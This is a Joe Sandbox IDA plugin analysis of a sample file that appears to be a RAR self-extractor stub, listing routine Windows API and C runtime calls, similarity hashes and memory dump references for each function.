                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1247370737-0
                                                                                                                                                                          • Opcode ID: 182a73b9ce78ebc51d21a5ce65a888476b19de6b46ea7c5b86e832668a29bbf8
                                                                                                                                                                          • Instruction ID: 775cd48046865396dc1398e56ac55de43d38203cc3512cca9e57ac955593418e
                                                                                                                                                                          • Opcode Fuzzy Hash: 182a73b9ce78ebc51d21a5ce65a888476b19de6b46ea7c5b86e832668a29bbf8
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E4115B2508305AFC710DF69C884A6BBBE9FB88715F10896EF596D2210E734E649CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B22536
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                                                                                                          • API String ID: 3053425827-2277559157
                                                                                                                                                                          • Opcode ID: 87c04403336bbaeff9ec7ab764c9f741142d53e749fad501977522905d5bcee5
                                                                                                                                                                          • Instruction ID: 3af569294640340d2ef8f94c169ac639f8494c6f24d750e26b9c3ff32c798612
                                                                                                                                                                          • Opcode Fuzzy Hash: 87c04403336bbaeff9ec7ab764c9f741142d53e749fad501977522905d5bcee5
                                                                                                                                                                          • Instruction Fuzzy Hash: D6F13971604350ABCB25EB24A4957BE77D9AF94300F0805EDFD8DDF283CB648945C7A2
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                          • API String ID: 176396367-3568243669
                                                                                                                                                                          • Opcode ID: 2ef7b69ad7057d68aec21c5c3dc74ecaa8d092f1a235c7e5620156afcd576f1d
                                                                                                                                                                          • Instruction ID: bbae10f26dbb199ce0ad739add36b1c535389af80238d7ba6608304d0b8572ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef7b69ad7057d68aec21c5c3dc74ecaa8d092f1a235c7e5620156afcd576f1d
                                                                                                                                                                          • Instruction Fuzzy Hash: A851156A74432395DB30AA299C1277673E4DFA1750F7808EAFDC18B2C0FBE58D858261
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B4FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00B4F6CF
                                                                                                                                                                          • __fassign.LIBCMT ref: 00B4F74A
                                                                                                                                                                          • __fassign.LIBCMT ref: 00B4F765
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B4F78B
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00B4FE02,00000000,?,?,?,?,?,?,?,?,?,00B4FE02,00000000), ref: 00B4F7AA
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,00B4FE02,00000000,?,?,?,?,?,?,?,?,?,00B4FE02,00000000), ref: 00B4F7E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 1433b4166c537bf7d841602918e80b98309421ce36ddec246bd99b749cb0b245
                                                                                                                                                                          • Instruction ID: 51969f88ba2e929927249e924c82c140a5ecba70a4005d274a01e9cc957f4599
                                                                                                                                                                          • Opcode Fuzzy Hash: 1433b4166c537bf7d841602918e80b98309421ce36ddec246bd99b749cb0b245
                                                                                                                                                                          • Instruction Fuzzy Hash: F451A5B1D0024A9FDB10CFA8DC85BEEBBF4EF09710F1541AAE555E7291D730AA41CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B42937
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B4293F
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B429C8
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00B429F3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B42A48
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: bb77dca70d571cfc9e7fece9ad743c4a7377cae7787edc086e1095c18bcfca0c
                                                                                                                                                                          • Instruction ID: e679666a007172c938e985107dab53b41a7084b1b178b36521993be4fea3b1dd
                                                                                                                                                                          • Opcode Fuzzy Hash: bb77dca70d571cfc9e7fece9ad743c4a7377cae7787edc086e1095c18bcfca0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E418E34A00208ABCF10DF68C885AAEBBF5EF45324F5481E5FC15AB392D7719B45EB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00B39EEE
                                                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 00B39F44
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00B39FDB
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00B39FE3
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00B39FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$RectText
                                                                                                                                                                          • String ID: RarHtmlClassName
                                                                                                                                                                          • API String ID: 3937224194-1658105358
                                                                                                                                                                          • Opcode ID: 1c349a65daeab9b66bf1dbf92b578efd0d398d7987df79eeb0515f8eda45e126
                                                                                                                                                                          • Instruction ID: cb5979fb7ce697b3c88ef4b71624d3fa0d2a3907e5d814424025ef511611c3ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c349a65daeab9b66bf1dbf92b578efd0d398d7987df79eeb0515f8eda45e126
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D41A331004210AFD721AF64DC8CB5B7BE8FF48F01F204599F845AA166DB74EA44CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                          • API String ID: 176396367-3743748572
                                                                                                                                                                          • Opcode ID: 7f3f88c5e87dda9bdcd2fc29d9ebd8509295ade2cd802c4ca3ccc31d785e8ddc
                                                                                                                                                                          • Instruction ID: 748d67567e79be3dce71470d99ef48db5e267af068b435734267923f7c88de44
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3f88c5e87dda9bdcd2fc29d9ebd8509295ade2cd802c4ca3ccc31d785e8ddc
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31523264434556DA30AB549C82B7B73E4EB50720F70469FF886573C0FBE0AE8583A1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4C868: _free.LIBCMT ref: 00B4C891
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C8F2
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C8FD
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C908
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C95C
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C967
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C972
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C97D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction ID: 04d92524d7c417209d836157291f8b54f804460d4be9c98bd6a73ddfd8ac68cd
                                                                                                                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction Fuzzy Hash: B9111F71A82B08AAE561B7B5CC07FDB7FEC9F04F00F404C69B29D66092DA65B605A750
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B3E669,00B3E5CC,00B3E86D), ref: 00B3E605
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B3E61B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B3E630
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                                          • Opcode ID: 580cbecad394db7f080b2b1ce7e80ed6233389a70a3052bfa5d3200ad3812e82
                                                                                                                                                                          • Instruction ID: 91ef141f19aef4fadd96736c774e6cb0b70110d5d9a90e0fa8ad365fbd3879cb
                                                                                                                                                                          • Opcode Fuzzy Hash: 580cbecad394db7f080b2b1ce7e80ed6233389a70a3052bfa5d3200ad3812e82
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0C2327813225B0F214E695C9676672CCEA35792B2408FBE921D72E0EF10CC559F90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B314C2
                                                                                                                                                                            • Part of subcall function 00B2B146: GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B314E6
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B31500
                                                                                                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B31513
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31523
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31533
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                                                          • Opcode ID: 624dd6471f62a8cc0fb48913edd4ef89ca64a684da9746cc2147aaaeffd9653d
                                                                                                                                                                          • Instruction ID: 800a8a02292ff37aa21442e2f2d2cce3bb1cf0aac00a973b171c328e82c5a4f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 624dd6471f62a8cc0fb48913edd4ef89ca64a684da9746cc2147aaaeffd9653d
                                                                                                                                                                          • Instruction Fuzzy Hash: BA31F775118345ABC704DFA8C88599BB7F8BF98754F004A1EF999D3210E730D509CBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B42AF1,00B402FC,00B3FA34), ref: 00B42B08
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B42B16
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B42B2F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00B42AF1,00B402FC,00B3FA34), ref: 00B42B81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 37c74537ce9946b900dac82d9798911b7ae1fadeea48f8bb3ff8dbb5fe499cdb
                                                                                                                                                                          • Instruction ID: 1d9b42250ce544f111ef4029a9abbe956d6184c9ec1b2a109f6fcd73cbdf38b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 37c74537ce9946b900dac82d9798911b7ae1fadeea48f8bb3ff8dbb5fe499cdb
                                                                                                                                                                          • Instruction Fuzzy Hash: E401D43250A7116EAA192F747C85B2A2FD9EB45BB6BE407F9F120561E0EF118F00B154
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00B61030,00B44674,00B61030,?,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B497E9
                                                                                                                                                                          • _free.LIBCMT ref: 00B4981C
                                                                                                                                                                          • _free.LIBCMT ref: 00B49844
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B49851
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B4985D
                                                                                                                                                                          • _abort.LIBCMT ref: 00B49863
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 2654ea88e364f0ff53d21a908c2bb66655560514730fa218da88215b8b641dcf
                                                                                                                                                                          • Instruction ID: f38ca0a69b5f7d28fdea3a8e75fb9c97376d83c265cc5d41b4381d894754c8b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2654ea88e364f0ff53d21a908c2bb66655560514730fa218da88215b8b641dcf
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F0A43654070166C75237286C5AB2B2BE5CFE2BB2F3501F8F624972D2FE21CB01B565
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B3DC47
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3DC61
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3DC72
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3DC7C
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3DC86
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B3DC91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2148572870-0
                                                                                                                                                                          • Opcode ID: 3b3758a603a146803e4501aec74fa7e86bdee0803b11185c24f7ee4d66e05502
                                                                                                                                                                          • Instruction ID: ad672d11bae9f3ab119728034fcc6fcfc9fea29f6695979c641c468a65ee263d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b3758a603a146803e4501aec74fa7e86bdee0803b11185c24f7ee4d66e05502
                                                                                                                                                                          • Instruction Fuzzy Hash: 04F03C72A01219BBCB206BA5EC4CECB7FADEF46B91F144111B50AE2060DA749646C7A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B2B92D: _wcsrchr.LIBVCRUNTIME ref: 00B2B944
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2C197
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2C1DF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$_wcsrchr
                                                                                                                                                                          • String ID: .exe$.rar$.sfx
                                                                                                                                                                          • API String ID: 3513545583-31770016
